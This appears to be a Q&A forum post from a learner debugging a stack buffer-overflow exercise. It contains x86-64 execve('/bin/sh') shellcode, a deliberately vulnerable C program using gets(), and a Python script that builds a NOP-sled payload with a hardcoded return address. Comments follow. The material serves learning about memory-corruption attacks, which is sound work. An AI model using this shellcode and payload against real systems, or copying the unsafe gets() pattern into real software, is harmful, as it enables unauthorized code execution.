# why does the shellcode get segmentation fault?

Tags: c, linux, buffer-overflow, shellcode, stack-smash

I am new to buffer overflow attacks.

I copy the shellcode from http://shell-storm.org/shellcode/files/shellcode-76.php

I wrote a c script to test the shellcode.

It looks like this:

```
char * shellcode =  "\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57 \x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05";

int main(){
    void (*f) ()= (void(*)())shellcode;
    (*f)();
    return 0;
}
```

It works well. It can generate a shell.
But when I wrote another c script, "tS.c",  to test the shellcode, I got a segmentation fault.

My c script looks like:

```
void hello(){
    char s[144];
    gets(s);
    printf("%s\n", s);
}

int main(){
    hello();
    return 0;
}
```

I use a python script, "sc.py", to generate my payload.

And it looks like:

```
s_storm = "\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"

attack = s_storm
size = len(attack)
nops = '\x90'*(144 - size)
retAddr = 0x7fffffffde14 
ex = nops + attack + '\x00'*8 + p64(retAddr)  
print ex
```

The payload works in gdb, and it can successfully spawn a shell.
So I have no idea where I did wrong.

I compiled my c script by:

```
gcc tS.c -o ts -z execstack -fno-stack-protector -no-pie
```

I also turn off the aslr in Linux.
I have tried different ways to feed the payload to the process:

```
(python sc.py; cat)| ./ts
./ts <exploit
```

I am using Ubuntu64 and my Linux version is 5.0.0-37-generic.

Can someone please tell me where I did wrong or give me some advice about what should I read?

Comment: How do you test it with gdb?

Comment: gdb ts
r < exploit
and the result is:
process 2463 is executing new program: /bin/dash
[Inferior 1 (process 2463) exited normally]

Comment: sorry, I don't know how to add a new line

Comment: I don't understand. What do you expect your "c script" to do?

Comment: It just gets a string. And I want to spawn a shell by nop sled.

Comment: How do you "want to spawn a shell" by "getting a string"? How does "getting a string" connect with "spawning a shell"? What is a `nop sled` ? With `gets` you are storing a null terminated string into the character array `s`. Because `gets` has no overflow checking, most probably you are trying to write past the available memory in `s` buffer, which results in segmentation fault - which is literally the failure condition you get when writing to a kernel protected memory. I guess.

Comment: I am trying to overflow the buffer. So I use gets which has no overflow checking to overwrite the return address in the memory. I want to jump to the shellcode to spawn a shell. Like this video: https://www.youtube.com/watch?v=HSlhY4Uy8SA&feature=youtu.be&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&t=622

Comment: @KamilCuk A `nop` sled is a large string of `nop`s (one byte instructions that perform no operations) that "slide" down to an area of memory where a payload (a portion of code intended to be executed during an attack) is stored.